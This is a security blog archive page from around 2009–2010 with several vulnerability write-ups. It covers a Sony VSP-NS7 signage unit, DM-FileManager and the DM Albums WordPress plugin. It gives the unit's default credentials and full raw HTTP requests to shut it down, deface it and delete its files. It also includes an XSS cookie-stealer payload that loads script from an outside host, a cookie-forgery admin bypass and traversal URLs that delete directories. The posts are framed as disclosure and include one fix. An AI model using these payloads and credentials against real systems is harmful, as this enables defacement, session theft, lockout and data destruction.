nDarkness

Tag: Hacking

Sony VSP-NS7 Digital Signage Hacking

by on Sep.07, 2010, under Computer Security, Privacy, Software

Recently I tested out a Sony VSP-NS7 digital signage unit for a customer. This machine really impressed me considering I had used its predecessor the NSP100 and the newer technology was just what the client needed.

After doing some online searching I found that, other than the manual, there wasn’t much information out there on this unit. Knowing that we were going to place this box on a public network, I decided to run a few tests. I began by firing up Wireshark to sniff traffic to and from this box and was very surprised by what I found.

From this research I was able to determine that there is a web server running on port 4980 by default. Next I was able to retrieve the default username and password of the box by decoding the base64 string below.


    Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
    Authorization: Basic NSPXuser:NSPXuser

    space

Since this isn’t published anywhere else I have seen, I would guess that not many users of this system know about it. In fact I would dare say that most installations of this system are still using the default username and password since Sony only mentions that the box can be controlled using their additional VSPA-D7 management software. If it costs big bucks it must be good, right?

Below are some of my findings:


    Default user information
    ————————
    User: NSPXuser
    Pass: NSPXuser
    Port: 4980

    Found commands
    ————————
    http://ip:4980 – Contains sofware version, unit name, unit and harddrive serial number and MAC address.
    http://ip:4980/import/ – Contains all user uploaded content.
    http://ip:4980/command.php – Uses several get variables to control the box.
    http://ip:4980/upload.php – Used in conjunction with get variables to send content to the box.

    http://ip:4980/command.php?cmd=NLOG&comp=cab – Download system logs.
    http://ip:4980/command.php?cmd=SLOG – Displays system logs.
    http://ip:4980/command.php?cmd=SYST – System statistics.
    http://ip:4980/command.php?cmd=DRST – Harddrive statistics.
    http://ip:4980/command.php?cmd=PLCL – Play files.
    http://ip:4980/command.php?cmd=SPCL – Stop playing files.
    http://ip:4980/command.php?cmd=CLST&table=web – List files based on type – web, still, movie and text.
    http://ip:4980/command.php?cmd=LCNF – Load configuration files.
    http://ip:4980/command.php?cmd=RMCL – Remove files.
    http://ip:4980/command.php?cmd=LTBL – Load tables.

    Power off and restart
    ————————
    http://ip:4980/command.php?cmd=RSET&shutdown – Turn the unit off
    http://ip:4980/command.php?cmd=RSET&reboot – Restart unit

    space

Shutdown Sony VSP-NS7

Fire up a telnet session and enter:

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
GET /command.php?cmd=RSET&shutdown HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Cache-Control: no-cache

Without any warning the unit will shut down and have to be restarted from the box or management software if the network allows magic packets.

URL Injection/Defacement Sony VSP-NS7

Fire up a telnet session and enter:

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
PUT /upload.php?href=/import/db/property0.xml&append=0&mkdir=0 HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Content-Length: 601
Cache-Control: no-cache

<?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot; standalone=&quot;yes&quot;?>
<content ver=&quot;1.0&quot; date=&quot;2010-09-06&quot; time=&quot;21:28:43&quot;>
	<delete table=&quot;WEB_TBL&quot;>
		<index>004000003</index>
	</delete>
	<insert table=&quot;WEB_TBL&quot;>
		<index>004000003</index>
		<cdate>2010-09-06 21:21:55.678</cdate>
		<title>Pwnage</title>
		<size>0</size>
		<deldate>2010-10-06</deldate>
		<link>http://www.ndarkness.com/?p=577</link>
		<info>Pwned</info>
		<change>01</change>
		<width>0</width>
		<height>0</height>
		<xoffset>0</xoffset>
		<yoffset>0</yoffset>
		<xoption>0</xoption>
		<xreload>0</xreload>
	</insert>
</content>

Next we write the group file.

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
PUT /upload.php?href=/import/group0.xml&amp;append=0&amp;mkdir=0 HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Content-Length: 185
Cache-Control: no-cache

<?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?>
<group ver=&quot;1.0&quot; date=&quot;2010-09-06&quot; time=&quot;21:28:43&quot;>
	<property date=&quot;2010-09-06&quot; time=&quot;21:28:43&quot;>/import/db/property0.xml</property>
</group>

Now we need to load the file.

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
GET /command.php?cmd=LTBL&amp;file=/import/group0.xml&amp;mode=2 HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Cache-Control: no-cache

Finally let’s force the unit to call our url.

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
GET /command.php?cmd=PLCL&amp;id=06&amp;index=004000003 HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Cache-Control: no-cache

Delete Files From Sony VSP-NS7

First we need to obtain a list of images on the unit.
Fire up a telnet session and enter:

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
GET /command.php?cmd=CLST&amp;table=still HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Cache-Control: no-cache

Now we simply select the image we want to delete and enter the following:

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
GET /command.php?cmd=RMCL&amp;table=still&amp;index=002000002 HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Cache-Control: no-cache

The VSPA-D7 management software does allow the default password and port to be changed but if the traffic is sniffed, the password can be easily decoded again. Not to mention we can use similar attack method to change the password of the box and lock the administrator out. Talk about a denial of service!

The only secure solution for this unit, is to use a crossover cable and directly connect to the box or put it on a network by itself. If you leave it on a public network it is only a matter of time before it falls prey to one of the attacks listed above.

1 Comment :, , , , more...

WordPress Sites Hacked in Bulk

by on May.10, 2010, under Computer Security, Linux, Privacy, Software

By now, I’m sure we have all heard about the numerous WordPress sites that have been hacked on several of the major hosting providers. From all of the reports so far, no one can seem to figure out what the problem is or how the breaches are happening.

Is the problem a server misconfiguration, outdated WordPress blog, weak passwords or a serious bug in WordPress itself?

If your site has been hacked and you have access to the access_logs, post them along with any other relevant information that you have and as a community let’s go through the information to see if we can find the problem.

Leave a Comment :, , , more...

DM-FileManager 3.9.9 XSS Vulnerability

by on Jan.30, 2010, under Computer Security

The nDarkness community has recently been working with the wonderful developers over at DutchMonkey.com to review and point out security flaws in some of their freely available software.

During this review process, there were several issues found and we will be posting them in the coming weeks for educational purposes. It is our hope that this information will be used to help others write more secure code and realize the dangers involved with these mistakes.

DM-FileManager 3.9.9 and below is vulnerable to XSS via the message variable not being properly sanitized.

This example shows nDarkness.com in an iframe within the login page:

http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=<p align=center><iframe src=http://ndarkness.com width=100% height=800></iframe></p>

Here is a url encoded version:

http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=%3C%70%20%61%6C%69%67%6E%3D%63%65%6E%74%65%72%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%6E%64%61%72%6B%6E%65%73%73%2E%63%6F%6D%20%77%69%64%74%68%3D%31%30%30%25%20%68%65%69%67%68%74%3D%38%30%30%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%70%3E

and one step farther is the cookie stealer script:

http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=<SCRIPT SRC=http://www.ndarkness.com/get-cookie.js></SCRIPT>

Here is a url encoded version:

http://localhost/~safety/dm-filemanager/login.php?message=%3C%53%43%52%49%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%62%6C%6F%67%2E%6E%64%61%72%6B%6E%65%73%73%2E%63%6F%6D%2F%67%65%74%2D%63%6F%6F%6B%69%65%2E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E

A common exploit for this would be to make up a bug report and alert the site owner of the situation in the hopes that they were logged in when they clicked the link above. The next step would be to use session hijacking to steal the user’s session.

Another option is to call the delete folder ajax.php command and let the user delete directories off of their site.

http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=http://localhost/~safety/dm-filemanager/ajax.php?currdir=/safety/Sites/wp/&rmdir=yes&folder=/safety/Sites/wp/wp-admin&dir=wp-admin

DM-Filemanager users should not follow untrusted links and should upgrade to the latest version.

Leave a Comment :, , , , , more...

DM-FileManager 3.9.6 Cookie Injection and Authorization Bypass Vulnerability

by on Dec.09, 2009, under Computer Security, Privacy

The nDarkness community has recently been working with the wonderful developers over at DutchMonkey.com to review and point out security flaws in some of their freely available software.

During this review process, there were several issues found and we will be posting them in the coming weeks for educational purposes. It is our hope that this information will be used to help others write more secure code and realize the dangers involved with these mistakes.

The first major issue we found was with DM-Albums version 2.0. After reviewing this software and helping to add greater support for WPMU installations, we moved on to DM-FileManager version 3.9.6. The fist major issue we found with this software prompted us to take a deeper look at the authorization model used by this file manager software. Below is the vulnerable code and the method used to exploit it. Please be aware that this has since been fixed and is no longer vulnerable.

I discovered that cookie variables were being used to determine a users ability to access certain features of the software. The cookies I found that mattered were:

GROUP=ADMINISTRATORS; GROUPID=1;

The group id cookie gives you the admin.php button (footer.php, line 49) – Not necessary but it was a start.

if($GROUPID == 1)
{
	print(" <a href=\"admin.php\" class=\"admin\"><img src=\"ui/$USERINTERFACE/png/admin.png\" border=\"0\" height=\"15\"/></a> ");
}

Being in the administrator group (admin.php, line 116) lets you use the admin.php page.

if($GROUP != "ADMINISTRATORS") redirect("/?currdir=$currdir");

To exploit this we used javascript injection. From the log in page I entered the following in the address bar and reloaded the page:

javascript:void(document.cookie="GROUP=ADMINISTRATORS");void(document.cookie="GROUPID=1");

When the page reloaded, the admin button was in the footer of the page and it allowed me to use the admin.php page. Once in the admin interface you have full control of the file manager software and can for example, change the admins email address to yours and use the forgot password feature to receive the admins unencrypted password (more on this issue in future posts).

All DM-FileManager users are strongly encouraged to upgrade their software to the latest version.

1 Comment :, , , , , more...

WordPress – DM Albums Version 2.0 Critical Vulnerability

by on Oct.21, 2009, under Computer Security, Privacy

The latest version of DM Albums was released on 10/21/2009 to all WordPress users and it contains a serious flaw that can allow an attacker to remotely delete any file or folder they wish. The author has been notified of the problem and I have listed a work around below to prevent directory traversal.

After upgrading to the latest version of DM Albums I was playing with the new features and noticed the function to delete albums. I dug into the code located at wp-content/plugins/dm-albums/wp-dm-albums-ajax.php and found that there is no check to see if someone has used directory traversal. This means that anyone can delete files or directories outside of the upload directory.

Example:

    http://someblogsite/wp-content/plugins/dm-albums/wp-dm-albums-ajax.php?delete_album=../../../public_html

The vulnerable section that allows this to take place is:

    if(isset($_GET[“delete_album”]) && !empty($_GET[“delete_album”]) && strlen($_GET[“delete_album”]) > 0)
    {
    //delete the album directory
    dm_get_album_delete($DM_UPLOAD_DIRECTORY . $_GET[“delete_album”]);
    }

In this code there is no check to see what is contained in the GET variable and you don’t even need to be logged in to delete files.

Below is a quick and dirty work around to prevent the problem and I would suspect there will be more checks to ensure that user input is sanitized in the near future. This work around will not prevent malicious users from deleting your albums but it will keep folders outside of the upload directory safe.

    if(isset($_GET[“delete_album”]) && !empty($_GET[“delete_album”]) && strlen($_GET[“delete_album”]) > 0)
    {
    //remove the / character from user input
    $_GET[“delete_album”] = str_replace(“/”, “”, $_GET[“delete_album”]);

    //delete the album directory
    dm_get_album_delete($DM_UPLOAD_DIRECTORY . $_GET[“delete_album”]);
    }

Once I hear back from the author I will update this post to let everyone know the outcome.

Update: A new release, v2.0.1, with the above mentioned work around has been released. We should also expect to see another update in the next few days that will employ more security checks and some upgrades for WordPress multi user environments as well.

Leave a Comment :, , , , , more...

Looking for something?

Use the form below to search the site:

Still not finding what you're looking for? Drop a comment on a post or contact us so we can take care of it!

Blogroll

A few highly recommended websites...